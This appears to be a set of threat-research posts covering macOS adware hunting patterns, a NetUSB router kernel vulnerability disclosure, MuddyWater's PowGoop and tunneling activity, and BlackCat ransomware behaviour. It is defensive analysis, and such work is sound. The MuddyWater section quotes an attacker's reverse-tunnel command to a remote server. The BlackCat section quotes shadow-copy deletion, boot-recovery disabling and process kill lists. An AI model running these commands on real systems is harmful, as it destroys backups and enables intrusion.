/Library/Application\ Support/\.[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}/\.[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}


~/Library/Application Support/.6BA27F8C-697E-4A94-B97C-A0E6AC13F210/.54DA7A17-F1DC-477C-BB31-485FEAC29FE2
~/Library/Application Support/.399CEC38-2BB0-4263-8232-4CCAC933C9E2/.CB273BA5-3138-4274-8C61-B2CBA0F1B671

The Kotlin variants also reach out to a server with the pattern:

Hunting Regex


The wildcard part is consistently made up of two-word patterns that mimic the names seen in the System_Service and earlier Adload campaigns.


4. Other Adload Variants

A pattern seen across a number of different variants involves the Adload installer dropping a Mach-O executable in the /tmp/ directory with a filename prefixed with the letters “php” followed by 6 alphanumeric characters (a similar pattern is used by MaxOfferDeal/Genieo, which we discuss below).

Hunting Regex




A much older pattern that we still see occasionally appearing in live infections has the form:

Hunting Regex

/Library/Application\ Support/com\..*Lookup.*Lookup.*
/Library/Application\ Support/com\..*SearchDaemon.*Search.*


/Library/Application Support/com.OdysseusLookupDaemon/OdysseusLookup
/Library/Application Support/com.ExpertLookupEngineDaemon/ExpertLookupEngine
/Library/Application Support/com.ApolloSearchDaemon/ApolloSearch
/Library/Application Support/com.GlobalToolboxSearchDaemon/GlobalToolboxSearch

There are other minor variants on this naming convention that will be readily recognizable once you are familiar with the above patterns. For more information on this pattern see here.

5. Bundlore, Shlayer, and ZShlayer

Bundlore has been around since at least 2014 and, after Adload, is the most prevalent family we see in live infections throughout 2021 and into the beginning of 2022.

Bundlore payloads are typically dropped by a Shlayer or ZShlayer DMG installer. Often the Shlayer or ZShlayer installer will have one of the following file patterns:

Hunting Regex




Note that in the case of the “Install” pattern, the “I” can appear as both upper and lowercase. We see the “Player” version more often than the “Install” one.

The first-stage Bundlore payload will be dropped in a random folder created in the /tmp/ directory with a corresponding name:

Hunting Regex




Two much older DMG patterns associated with the original Shlayer DMGs, but which we only see on rare occasions now are:

Hunting Regex


6. Pirrit

Pirrit is a macOS malware family that was first seen in 2016 and remained relatively active throughout 2017 but had all but disappeared until November 2021. Since then, Pirrit has seen a new burst of activity.

In common with Bundlore, Pirrit will typically drop via a user-executed DMG, although the disk image name and application name tend to be as follows:

/Volumes/Install Flash Player/Install Flash Player

Pirrit’s first-stage payload drops in the Darwin_User_Temp_Dir (rather than the system /tmp dir) and uses an 8-character random directory name with either tmp or Installer as a prefix.

Hunting Regex




The next stage of the infection usually drops in the Application Support folder with a random name:

Hunting Regex

~/Library/Application\ Support/com\.[A-Za-z]*/[A-Za-z]*


~/Library/Application Support/com.described/described
~/Library/Application Support/com.memberd/memberd
~/Library/Application Support/com.Searchie/Searchie

A further component is written to a folder in the User’s Library folder or local domain Library folder (depending on available permissions) and contains an application of the same name:

Hunting Regex




This variant of Pirrit appears to be rapidly evolving. A recent sample installed this application inside the Application Support folder:

~/Library/Application Support/com.SearchZen/

Depending on permissions when the infection runs, Pirrit may also install some components into /var/root/.

Behaviorally, Pirrit is a good example of adware that attempts evasion techniques that only become apparent upon execution.

VM Detection/Evasion Behavior

/usr/bin/grep grep -q VirtualBox\|Oracle\|VMware\|Parallels
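The grep above scans command output for virtualization vendor strings. The equivalent logic, sketched in Python (the hardware-info strings here are hypothetical examples):

```python
# Sketch of Pirrit's VM check: the grep invocation above simply looks
# for virtualization vendor strings in system output. The input
# strings below are hypothetical examples.

VM_MARKERS = ("VirtualBox", "Oracle", "VMware", "Parallels")

def looks_like_vm(hardware_info: str) -> bool:
    """Mimic `grep -q 'VirtualBox|Oracle|VMware|Parallels'`."""
    return any(marker in hardware_info for marker in VM_MARKERS)

print(looks_like_vm("Model Identifier: VMware7,1"))       # True
print(looks_like_vm("Model Identifier: MacBookPro16,1"))  # False
```

If a marker is found, the adware can bail out before exhibiting any malicious behavior, frustrating analysis in virtualized sandboxes.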

7. MaxOfferDeal / Genieo

Genieo is another long-standing, common macOS malware family that goes in and out of periods of activity. Late 2021 saw some new variants, which we continue to track, though we have seen little activity since. The most prevalent one on our radar uses a persistent LaunchAgent with the following pattern for its program argument:


~/Library/Application Support/.gettime/GetTime

Interestingly, the persistence file is copied from a /tmp/ file that uses a naming pattern similar to Adload’s, namely “php” followed by 6 characters. This may be coincidental or deliberate; either way, it may have caused some vendors to identify one as the other.

The same regex we showed for Adload Mach-Os above, however, will also find these .plist files.



However, in the Adload case, these files are always Mach-Os, whereas in the MaxOfferDeal/Genieo case they are always property lists. We see no other indicators or similarities between the executable and known Adload variants.

8. MMInstall/MacUpdater

MMInstall has been around since at least early 2018 and typically installs a LaunchAgent with a program argument carrying a variety of names such as “MyShopCoupon”, “CouponSmart” and similar. Older forms typically had an executable named “mm-install-macos”, but we haven’t seen those for some time.

Apple recently updated their XProtect malware signatures for a newer version of this adware threat that appears to have been active during the middle of 2021. The following domains are still currently active:

Hunting regex


The only known installer pattern we have seen to date is as follows.



Most adware arrives in the form of trojanized applications that users are persuaded to attempt to install. Free content, cracked apps, and “special deals” are typical vectors. The fact that some – although by no means all – adware installers make a show of obtaining user consent doesn’t ameliorate the situation: in the cases where that does happen, the consent mechanism is itself often misleading or aggressive.

Regardless of how it is installed, unless the user has permission from the device owner, adware will almost certainly be unwanted on company-owned devices. Given its aggressive behavior, adware should be of no less concern than any other type of malware.

We hope the information in this post will aid security teams in identifying and removing adware infections on Mac devices. We would also encourage analysts to become familiar with other useful behavioral indicators associated with a wide range of macOS threats, including adware families, which can be found here.

CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers

11 January 2022 at 11:56

Executive Summary

  • SentinelLabs has discovered a high severity flaw in the KCodes NetUSB kernel module used by a large number of network device vendors and affecting millions of end user router devices.
  • Attackers could remotely exploit this vulnerability to execute code in the kernel.
  • SentinelLabs began the disclosure process on the 9th of September and the patch was sent to vendors on the 4th of October.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.


As with a number of my projects, this one started when I heard that Pwn2Own Mobile 2021 had been announced and I set about looking at one of the targets. Having not looked at the Netgear device when it appeared in the 2019 contest, I decided to give it a lookover.

While going through various code paths in various binaries, I came across a kernel module called NetUSB. As it turned out, this module was listening on TCP port 20005 on the IP

Provided there were no firewall rules in place to block it, that would mean it was listening on the WAN as well as the LAN. Who wouldn’t love a remote kernel bug?

NetUSB is a product developed by KCodes. It’s designed to allow remote devices in a network to interact with USB devices connected to a router. For example, you could interact with a printer as though it is plugged directly into your computer via USB. This requires a driver on your computer that communicates with the router through this kernel module.

It’s licensed to a large number of other vendors for use in their products, most notably:

  • Netgear
  • TP-Link
  • Tenda
  • EDiMAX
  • DLink
  • Western Digital

NetUSB.ko Internals

Back in 2015 a different NetUSB vulnerability was discovered. From that came some great resources (including a very helpful exploit for that vulnerability by bl4sty which helped quickly verify this vulnerability).

The handshake used to initiate a connection is as follows:

The handshake that initializes communication

After the handshake, a command-parsing while-loop is executed that contains the following code:

The code that takes a command number and routes the message to the appropriate SoftwareBus function

SoftwareBus_fillBuf acts in a similar way to recv by taking both a buffer and its size, filling the buffer with data read from the socket.

The Vulnerability

The command 0x805f reaches the following code in the function SoftwareBus_dispatchNormalEPMsgOut:

The vulnerable segment of code in the kernel module

Four bytes are fetched from the remote PC. The value 0x11 is added to this number, which is then used as the size for a kmalloc allocation. Since the supplied size isn’t validated, the addition of 0x11 can cause an integer overflow: a size of 0xffffffff, for example, results in 0x10 after 0x11 has been added to it.
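The wraparound is easy to verify; a minimal sketch of the 32-bit arithmetic described above:

```python
# Demonstration of the integer overflow: the attacker-supplied size
# has 0x11 added before being passed to kmalloc(); on a 32-bit
# system the sum wraps around modulo 2**32.

def kmalloc_size(user_supplied_size: int) -> int:
    """Size actually passed to kmalloc after adding 0x11 (mod 2**32)."""
    return (user_supplied_size + 0x11) & 0xFFFFFFFF

print(hex(kmalloc_size(0xFFFFFFFF)))  # 0x10 -- a tiny allocation
print(hex(kmalloc_size(0x1000)))      # 0x1011 -- the normal case
```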

This allocated region is then used and written to through both dereferencing and through the SoftwareBus_fillBuf function:

Out-of-bounds writes taking place on the small allocated region

Looking at the final call to SoftwareBus_fillBuf, the supplied size is used as a maximum value to read from the remote socket. From the previous example, the size 0xffffffff would be used here (not the overflowed value) as the size sent to recv.

Along with our report, we sent a suggested mitigation strategy. Before allocating memory with user-supplied sizes, an integer overflow check should be performed, as so:

if (user_supplied_size + 0x11 < user_supplied_size)
    return; // the addition overflowed: reject the request


From an exploit perspective, there are a number of things to consider.

First, the minimum size we can allocate is 0x0 and the maximum is 0x10. That means that the allocated object will always be in the kmalloc-32 slab of the kernel heap.

Second, we need to consider the amount of control over the overflow itself. We already know that the data being received over the socket is within control of the attacker, but is the size negotiable in any way? Since a size of 0xffffffff is not realistically exploitable on a 32-bit system, it’s necessary to take a look at how SoftwareBus_fillBuf actually works. Underneath this function is the standard socket recv function. That means that the size supplied is only used as a maximum receive size and not a strict amount, like memcpy.

It’s also important to consider how easy it is going to be to lay out the kernel heap for the overflow. Many exploits require the use of heap holes in order to make sure that the vulnerable heap structure will be placed before the object that will be overwritten. In the case of this kernel module, there’s a timeout of 16 seconds on the socket for receiving data, meaning the struct can be overflown up to 16 seconds after it is allocated. This removes the need to create a heap hole.

Finally, the selection of target structures that could be overwritten needs to be considered. There are some constraints as to which ones can be used.

  • The structure must be less than 32 bytes in size in order to fit into kmalloc-32.
  • The structure must be sprayable from a remote perspective.
  • The structure must have something that can be overwritten that makes it useful as a target (e.g. a Type-Length-Value structure or a pointer).

While these restrictions make it difficult to write an exploit for this vulnerability, we believe that it isn’t impossible and so those with Wi-Fi routers may need to look for firmware updates for their router.


Since this vulnerability is within a third-party component licensed to various router vendors, the only way to fix this is to update the firmware of your router, if an update is available. It is important to check whether your router is an end-of-life model, as such models are unlikely to receive an update for this vulnerability.

Exploring the Netgear firmware update, the vulnerability was patched by adding a new size check to the function:

The patch for the vulnerability, as implemented by Netgear


This vulnerability affects millions of devices around the world and in some instances may be completely remotely accessible. Due to the large number of vendors affected, we reported this vulnerability directly to KCodes to be distributed among their licensees, instead of targeting just the TP-Link or Netgear device in the contest. This ensures that all vendors receive the patch rather than just one.

While we are not going to release any exploits for it, there is a chance that one may become public in the future despite the rather significant complexity involved in developing one. We recommend that all users follow the remediation information above in order to reduce any potential risk.

Disclosure Timeline

  • 09 Sep, 2021 - An initial email to KCodes, requesting information on how to send the vulnerability information
  • 20 Sep, 2021 - The vulnerability details and a patch suggestion is disclosed to KCodes with a final disclosure date of December 20, 2021
  • 04 Oct, 2021 - A proof-of-concept script is requested by KCodes to verify the patch
  • 04 Oct, 2021 - A proof-of-concept script is provided
  • 17 Nov, 2021 - An email is sent to KCodes to double check that the patch was sent out to all vendors on the 4th of October, and not just Netgear
  • 19 Nov, 2021 - KCodes confirms that they had sent the patch to all vendors and that the firmware would be out before the 20th December
  • 14 Dec, 2021 - Netgear was found to have released firmware for the R6700v3 device with the changes implemented
  • 20 Dec, 2021 - Netgear releases an advisory for the vulnerability
  • 11 Jan, 2022 - SentinelLabs publicly discloses details of the vulnerability

SentinelOne’s responsible disclosure policy can be found here.

Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor

12 January 2022 at 21:25


MuddyWater is commonly considered an Iranian state-sponsored threat actor but no further granularity has previously been available. As of January 12th, 2022, U.S. CyberCommand has attributed this activity to the Iranian Ministry of Intelligence (MOIS). While some cases allow for attribution hunches, or even fleshed out connections to handles and online personas, attribution to a particular government organization is often reserved to the kind of visibility only available to governments with a well-developed all-source and signals intelligence apparatus.

As in all cases of public government attribution, we take this as an opportunity to reassess our assumptions about a given threat actor all the while recognizing that we can’t independently verify the basis for this claim.

U.S. Cyber Command pointed to multiple malware sets used by MuddyWater. Among those, PowGoop correlates with activities we’ve triaged in recent incidents. We hope sharing relevant in-the-wild findings will further bolster our collective defense against this threat.

Iranian MOIS hacker group #MuddyWater is using a suite of malware to conduct espionage and malicious activity. If you see two or more of these malware on your network, you may have MuddyWater on it: Attributed through @NCIJTF @FBI

— USCYBERCOM Cybersecurity Alert (@CNMF_CyberAlert) January 12, 2022

Analysis of New PowGoop Variants

PowGoop is a malware family first described by Palo Alto which utilizes DLL search order hijacking (T1574.001). The name derives from the use of ‘GoogleUpdate.exe‘ to load a malicious modified version of ‘goopdate.dll‘, which in turn loads a malicious PowerShell script from an external file. Other variants were described by ClearSkySec and Symantec.

We identified newer variants of PowGoop loader that involve significant changes, suggesting the group continues to use and maintain it even after recent exposures. The new variants reveal that the threat group has expanded its arsenal of legitimate software used to load malicious DLLs. Aside from ‘GoogleUpdate.exe’, three additional benign pieces of software are abused in order to sideload malicious DLLs: ‘Git.exe’, ‘FileSyncConfig.exe’ and ‘Inno_Updater.exe’.

Each contains a modified DLL and a renamed authentic DLL. The hijacked DLL contains imports originating from its renamed counterpart, as well as two additional functions written by the attackers. The list of hijacked DLLs is presented below:

Software Name       Hijacked DLL       Renamed DLL
GoogleUpdate.exe    goopdate.dll       goopdate86.dll
inno_updater.exe    vcruntime140.dll   vcruntime141.dll
FileSyncConfig.exe  vcruntime140.dll   vcruntime141.dll
git.exe             libpcre2-8-0.dll   libpcre2-8-1.dll

Unlike previous versions, the hijacked DLLs attempt to reflectively load two additional files: one named ‘Core.dat’, a shellcode called from the export ‘DllReg’, and another named ‘Dore.dat’, a PE file with an ‘MZRE’ header that allows it to execute as shellcode as well (similar to publicly reported techniques), called from the export ‘DllRege’.

Those two ‘.dat’ files are identical for each of the hijacked DLLs. Both are executed using rundll32 on their respective exports, which read the file from disk into a virtually allocated buffer and then call offset 0 in the read data.

Both ‘Dore.dat’ and ‘Core.dat’ search for a file named ‘config.txt’ and run it using PowerShell in a fashion similar to older versions (T1059.001). The overlap in functionality between the two components is not clear; however, it is evident that ‘Core.dat’ represents a more mature and evolved version of PowGoop as it is loaded as a shellcode, making it less likely to be detected statically.

It is also worth noting that it is not necessary for both components to reside on the infected system as the malware will execute successfully with either one. Given that, it is possible that one or the other could be used as a backup component. The PowerShell payloads within ‘config.txt’ could not be retrieved at the time of writing.

Execution flow of new PowGoop variants
Execution flow of new PowGoop variants

MuddyWater Tunneling Activity

The operators behind MuddyWater activities are very fond of tunneling tools, as described in several recent blog posts (T1572). The custom tools used by the group often provide limited functionality and are used to drop tunneling tools which enable the operators to conduct a wider set of activities. Among the tunneling tools MuddyWater attackers have been observed using are Chisel, SSF and Ligolo.

The nature of tunneling activities is often confusing. However, analysis of Chisel executions by MuddyWater operators on some of the victims helps clarify their usage of such tools. This is an example of a command executed by the attackers on some of the victims:

 SharpChisel.exe client xx.xx.xx.xx:8080 r:8888:

The “r” flag used in the client execution implies the server is running in “reverse” mode. Setting the --reverse flag, according to Chisel documentation, “allows clients to specify reverse port forwarding remotes in addition to normal remotes”.

In this case, the “SharpChisel.exe” client runs on the victim machine, connects back to the Chisel server over port 8080, and specifies to forward anything coming over port 8888 of the server to port 9999 of the client.

This might look odd at first sight as port 9999 is not normally used on Windows machines and is not bound to any specific service. This is clarified shortly afterwards as the reverse tunnel is followed by setting up a Chisel SOCKS5 server on the victim, waiting for incoming connections over port 9999:

SharpChisel.exe server -p 9999 --socks5

By setting up both a server and a client instance of Chisel on the machine, the operators enable themselves to tunnel a variety of protocols which are supported over SOCKS5. This actually creates a tunnel within a tunnel. Given that, it is most likely the operator initiated SOCKS traffic to the server over port 8888, tunneling traffic from applications of interest to inner parts of the network.

The usage of Chisel and other tunneling tools effectively enables the threat actor to connect to machines within target environments as if they were inside the operator’s LAN.

Summary of MuddyWater tunneling using Chisel

Exchange Exploitation

When tracking MuddyWater activity, we came across an interesting subset of activity targeting the Exchange servers of high-profile organizations. This subset of Exchange exploitation activity is noteworthy because, without context, it would be difficult to attribute it to MuddyWater: the activity relies almost completely on publicly available offensive security tools.
The attackers attempt to exploit Exchange servers using two different tools:

  • A publicly available script for exploiting CVE-2020-0688 (T1190)
  • Ruler – an open source Exchange exploitation framework

CVE-2020-0688 Exploitation

Analysis of the activity observed suggests the MuddyWater threat group attempted to exploit CVE-2020-0688 on governmental organizations in the Middle East. The exploit enables remote code execution for an authenticated user. The specific exploit MuddyWater operators were attempting to run was utilized to drop a webshell.

The attempted webshell drop was performed using a set of PowerShell commands that write the webshell content into a specific path, “/ecp/HybridLogout.aspx”. The webshell awaits a “cmd” parameter and runs the commands it contains utilizing XSL Script Processing (T1220).
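As an illustrative defensive aid (the helper name and logic are ours, not part of the exploit), a defender could enumerate Exchange servers and probe for the dropped page, comparing its content against a known-good copy since the exploit overwrites it:

```python
from urllib.parse import urljoin

# Path written by the CVE-2020-0688 exploitation activity described above.
WEBSHELL_PATH = "/ecp/HybridLogout.aspx"

def webshell_check_url(base_url: str) -> str:
    """Build the URL to probe for the dropped webshell on an Exchange server.

    The returned page's content should be diffed against a known-good copy;
    the webshell variant accepts a 'cmd' parameter, so unexplained script
    blocks on this page warrant investigation.
    """
    return urljoin(base_url, WEBSHELL_PATH)
```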

A snippet of the webshell MuddyWater attempted to upload to Exchange servers

This activity is highly correlated with a publicly available CVE-2020-0688 exploitation script hosted in a Github repository. The script utilizes CVE-2020-0688 to upload an ASPX webshell to the path “/ecp/HybridLogout.aspx” (T1505.003). It is also one of the only publicly available CVE-2020-0688 implementations that drops a webshell.

A snippet of CVE-2020-0688 exploitation script

Ruler Exploitation

Among other activities performed by the threat actors was attempted Ruler exploitation. The instance identified targeted a telecommunication company in the Middle East. The observed activity suggests the threat actor attempted to create malicious forms, which is one of the most common usages of Ruler (T1137.003).

Usage of Ruler was previously associated with other Iranian threat actors, most commonly with APT33.


Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques. While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection. This is evident in the three distinct activities analyzed in this report: the evolution of the PowGoop malware family, the usage of tunneling tools, and the targeting of Exchange servers in high-profile organizations.

Like many other Iranian threat actors, the group displays less sophistication and technological complexity compared to other state-sponsored APT groups. Even so, it appears MuddyWater’s persistence is key to their success, and their lack of sophistication does not appear to prevent them from achieving their goals.

Indicators of Compromise

PowGoop variants (MD5, SHA1, SHA256)

  • Goopdate.dll
    • A5981C4FA0A3D232CE7F7CE1225D9C7E
    • 8FED2FF6B739C13BADB14C1A884D738C80CB6F34
    • AA48F06EA8BFEBDC0CACE9EA5A2F9CE00C094CE10DF52462C4B9E87FEFE70F94
  • Libpcre2-8-0.dll
    • F8E7FF6895A18CC3D05D024AC7D8BE3E
    • 97248B6E445D38D48334A30A916E7D9DDA33A9B2
    • F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3
  • Vcruntime140.dll
    • CEC48BCDEDEBC962CE45B63E201C0624
    • 81F46998C92427032378E5DEAD48BDFC9128B225
    • DD7EE54B12A55BCC67DA4CEAED6E636B7BD30D4DB6F6C594E9510E1E605ADE92
  • Core.dat
    • A65696D6B65F7159C9FFCD4119F60195
    • 570F7272412FF8257ED6868D90727A459E3B179E
    • B5B1E26312E0574464DDEF92C51D5F597E07DBA90617C0528EC9F494AF7E8504
  • Dore.dat
    • 6C084C8F5A61C6BEC5EB5573A2D51FFB
    • 61608ED1DE56D0E4FE6AF07ECBA0BD0A69D825B8
    • 7E7545D14DF7B618B3B1BC24321780C164A0A14D3600DBAC0F91AFBCE1A2F9F4


  • T1190 – Exploit Public-Facing Application
  • T1572 – Protocol Tunneling
  • T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking
  • T1059.001 – Command and Scripting Interpreter: PowerShell
  • T1505.003 – Server Software Component: Web Shell
  • T1220 – XSL Script Processing

BlackCat Ransomware | Highly-Configurable, Rust-Driven RaaS On The Prowl For Victims

18 January 2022 at 17:40

BlackCat (aka AlphaVM, AlphaV) is a newly established RaaS (Ransomware as a Service) with payloads written in Rust. While BlackCat is not the first ransomware written in the Rust language, it joins a small (yet growing) sliver of the malware landscape making use of this popular cross-platform language.

First appearing in late November, BlackCat has reportedly been attacking targets in multiple countries, including Australia, India and the U.S., and demanding ransoms in the region of $400,000 to $3,000,000 in Bitcoin or Monero.

BlackCat Ransomware Overview

In order to attract affiliates, the authors behind BlackCat have been heavily marketing their services in well-known underground forums.

BlackCat operators maintain a victim blog, as is standard these days. The blog hosts company names and any leaked data in the event that victims do not agree to cooperate.

Current data indicates that primary delivery of BlackCat is via third-party frameworks/toolsets (e.g., Cobalt Strike) or via exposed (and vulnerable) applications. BlackCat currently supports both Windows and Linux operating systems.

BlackCat Configuration Options

Samples analyzed to date require an “access token” to be supplied as a parameter upon execution. This is similar to threats like Egregor, and is often used as an anti-analysis tactic. This ‘feature’ exists in both the Windows and Linux versions of BlackCat.

However, the BlackCat samples we analyzed could be launched with any string supplied as the access token. For example:

Malware.exe -v --access-token 12345

The ransomware supports a visible command set, which can be obtained via the -h or --help parameters.

BlackCat command line options

As seen above, the executable payloads support a variety of commands, many of which are VMware-centric.

 --no-prop                                  Do not self propagate(worm) on Windows
 --no-prop-servers <NO_PROP_SERVERS>        Do not propagate to defined servers
 --no-vm-kill                               Do not stop VMs on ESXi
 --no-vm-snapshot-kill                      Do not wipe VMs snapshots on ESXi
 --no-wall                                  Do not update desktop wallpaper on Windows

In verbose mode (-v) the following output can be observed upon launch of the BlackCat payloads:

BlackCat ransomware run in verbose mode

BlackCat Execution and Encryption Behaviour

Immediately upon launch, the malware will attempt to validate the existence of the previously mentioned access-token, followed by querying for the system UUID (wmic).

Those pieces of data are concatenated together into what becomes the ‘Access key’ portion of their recovery URL displayed in the ransom note. In addition, on Windows devices, BlackCat attempts to delete VSS (Volume Shadow Copies) as well as enumerate any accessible drives to search for and encrypt eligible files.
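That concatenation can be sketched in a few lines of Python. This is our own reconstruction for illustration: `get_machine_uuid` and `make_access_key` are hypothetical helper names, and the exact key format is assumed from the observed behavior.

```python
import subprocess

def get_machine_uuid() -> str:
    """Windows-only sketch of the observed 'wmic csproduct get UUID' query."""
    out = subprocess.run(["wmic", "csproduct", "get", "UUID"],
                         capture_output=True, text=True).stdout
    # First non-empty line is the 'UUID' header; the value follows it.
    lines = [line.strip() for line in out.splitlines() if line.strip()]
    return lines[-1] if len(lines) > 1 else ""

def make_access_key(access_token: str, uuid: str) -> str:
    """Concatenate the supplied access token with the system UUID (format assumed)."""
    return access_token + uuid
```

In practice this means the recovery URL's ‘Access key’ is unique per victim machine even though affiliates may reuse the same access token across a campaign.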

Other configuration parameters are evaluated before proceeding to execute multiple privilege escalation methods, based on the OS identified by wmic earlier. These methods are visible at the time of execution and include the use of the COM Elevation Moniker.

It is at this point that BlackCat will attempt to terminate any processes or services listed within the configuration such as any processes which may inhibit the encryption process. There are also specific files and directories that are excluded from encryption. Much of this is configurable at the time of building the ransomware payloads.

The targeted processes and services are noted in the kill_processes and kill_services sections respectively. File and folder exclusions are handled in the exclude_directory_names section.

To further illustrate, the following were extracted from sample d65a131fb2bd6d80d69fe7415dc1d1fd89290394/74464797c5d2df81db2e06f86497b2127fda6766956f1b67b0dcea9570d8b683:


kill_services:
backup memtas mepocs msexchange
sql svc$ veeam vss


kill_processes:
agntsvc dbeng50 dbsnmp encsvc
excel firefox infopath isqlplussvc
msaccess mspub mydesktopqos mydesktopservice
notepad ocautoupds ocomm ocssd
onenote oracle outlook powerpnt
sqbcoreservice sql steam synctime
tbirdconfig thebat thunderbird visio
winword wordpad xfssvccon


exclude_directory_names:
$recycle.bin $windows.~bt $windows.~ws all users
appdata application data boot config.msi
default google intel mozilla
msocache perflogs program files program files (x86)
programdata public system volume information tor browser
windows windows.old

exclude_file_names:
autorun.inf boot.ini bootfont.bin bootsect.bak
desktop.ini iconcache.db ntldr ntuser.dat
ntuser.dat.log ntuser.ini thumbs.db

exclude_file_extensions:
386 adv ani bat bin cab cmd com
cpl cur deskthemepack diagcab diagcfg diagpkg dll drv
exe hlp hta icl icns ico ics idx
key ldf lnk lock mod mpa msc msi
msp msstyles msu nls nomedia ocx pdb prf
ps1 rom rtp scr shs spl sys theme
themepack wpx
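Based on the exclusion lists above, a defender can emulate the ransomware's file-selection logic. The following is a simplified Python sketch using only a subset of the configuration values; it is our own reimplementation for illustration, not the actual ransomware code:

```python
# Illustrative subset of the extracted exclusion configuration.
EXCLUDE_DIRS = {"windows", "program files", "tor browser", "perflogs"}
EXCLUDE_FILES = {"desktop.ini", "autorun.inf", "ntldr", "thumbs.db"}
EXCLUDE_EXTS = {"exe", "dll", "sys", "lnk", "msi"}

def would_encrypt(path: str) -> bool:
    """Return True if a path would be eligible for encryption under the config."""
    parts = [p.lower() for p in path.replace("\\", "/").split("/") if p]
    name = parts[-1]
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    if any(d in parts[:-1] for d in EXCLUDE_DIRS):
        return False  # file sits inside an excluded directory
    if name in EXCLUDE_FILES or ext in EXCLUDE_EXTS:
        return False  # excluded file name or extension
    return True
```

The exclusions serve a practical purpose: skipping OS-critical directories and executables keeps the machine bootable so the victim can still read the ransom note and reach the payment portal.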

BlackCat also spawns a number of its own processes, with syntax (for Windows) as follows:

 WMIC.exe (CLI interpreter)   csproduct get UUID
 cmd.exe (CLI interpreter)   /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"
 cmd.exe (CLI interpreter)   /c "wmic csproduct get UUID"
 cmd.exe (fsutil.exe)        /c "fsutil behavior set SymlinkEvaluation R2L:1"
 fsutil.exe                  behavior set SymlinkEvaluation R2L:1
 cmd.exe (fsutil.exe)        /c "fsutil behavior set SymlinkEvaluation R2R:1"

The fsutil-based modifications are meant to allow the use of both remote and local symlinks: BlackCat enables both ‘remote to local’ (R2L) and ‘remote to remote’ (R2R) symlink evaluation.

 fsutil.exe                     behavior set SymlinkEvaluation R2R:1
 cmd.exe (vssadmin.exe)         /c "vssadmin.exe delete shadows /all /quiet"
 reg.exe (CLI interpreter)      add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f

 cmd.exe (worldwideStrata.exe)  /c "C:\Users\admin1\Desktop\worldwideStrata.exe" --child
 vssadmin.exe                   delete shadows /all /quiet
 cmd.exe (ARP.EXE)              /c "arp -a"

Some more recently-built copies have a few additions. For example, in sample c1187fe0eaddee995773d6c66bcb558536e9b62c/c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40 we see the addition of:

 "wmic.exe Shadowcopy Delete"
 "iisreset.exe /stop"
 bcdedit.exe /set {default} recoveryenabled No
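These pre-encryption commands are highly detectable. The following is a minimal, illustrative Python sketch of the kind of command-line matching a defender might apply to process-creation telemetry; the patterns and function name are ours, not from any particular product:

```python
import re

# Patterns covering the recovery-inhibition commands observed above:
# shadow copy deletion, boot recovery tampering, and symlink evaluation tweaks.
SUSPICIOUS_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
    re.compile(r"fsutil(\.exe)?\s+behavior\s+set\s+symlinkevaluation", re.I),
]

def flag_command(cmdline: str) -> bool:
    """Return True if a process command line matches a known pre-encryption pattern."""
    return any(p.search(cmdline) for p in SUSPICIOUS_PATTERNS)
```

Shadow copy deletion in particular is common across many ransomware families, so a hit on these patterns is a strong early signal even before any file encryption begins.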

Much like other fine details, all this can be adjusted or configured by the affiliates at the time of building the payloads.

BlackCat configurations are not necessarily tailored to the target operating system. In the Linux variants we have analyzed to date, there are Windows-specific process, service, and file references in the kill_processes, kill_services, and exclude_directory_names sections.

The following excerpt is from sample f8c08d00ff6e8c6adb1a93cd133b19302d0b651afd73ccb54e3b6ac6c60d99c6.

Linux variant configuration

Specific encryption logic is not necessarily novel either and is somewhat configurable by the affiliate at the time of building the ransomware payloads. BlackCat supports both ChaCha20 and AES encryption schemes.

Extensions on encrypted files can vary across samples. Examples observed include .dkrpx75, .kh1ftzx and .wpzlbji.

BlackCat ransomware execution chain (Windows version)

Post-Infection, Payment and Portal

Infected clients will be greeted with a ransom note as well as a modified desktop image.

BlackCat’s modified desktop image

Infected users are instructed to connect to the attackers’ payment portal via TOR.

BlackCat ransom note

The ransom note informs the victim that not only have files been encrypted but data has been stolen.

Victims are threatened with data leakage if they refuse to pay, and are provided with a list of the data types that have been stolen.

In theory, once victims connect to the attacker’s portal, they are able to communicate and potentially acquire a decryption tool. Everything on the BlackCat portal is tied back to the specific target ID, which must be supplied correctly from the URL in the ransom note.


In its relatively short time on the radar, BlackCat has carved a notable place for itself amongst mid-tier ransomware actors. This group knows their craft and are cautious when selecting partners or affiliates. It is possible that some of the increased affiliation and activity around BlackCat is attributed to other actors migrating to BlackCat as larger platforms fizzle out (Ryuk, Conti, LockBit and REvil).

Actors utilizing BlackCat know their targets well and make every attempt to stealthily compromise enterprises. Prevention by way of powerful, modern endpoint security controls is a must. The SentinelOne Singularity Platform is capable of detecting and preventing BlackCat infections on both Windows and Linux endpoints.

Indicators of Compromise



T1027.002 – Obfuscated Files or Information: Software Packing
T1027 – Obfuscated Files or Information
T1007 – System Service Discovery
T1059 – Command and Scripting Interpreter
TA0010 – Exfiltration
T1082 – System Information Discovery
T1490 – Inhibit System Recovery
T1485 – Data Destruction
T1078 – Valid Accounts
T1486 – Data Encrypted For Impact
T1140 – Encode/Decode Files or Information
T1202 – Indirect Command Execution
T1543.003 – Create or Modify System Process: Windows Service
T1550.002 – Use Alternate Authentication Material: Pass the Hash

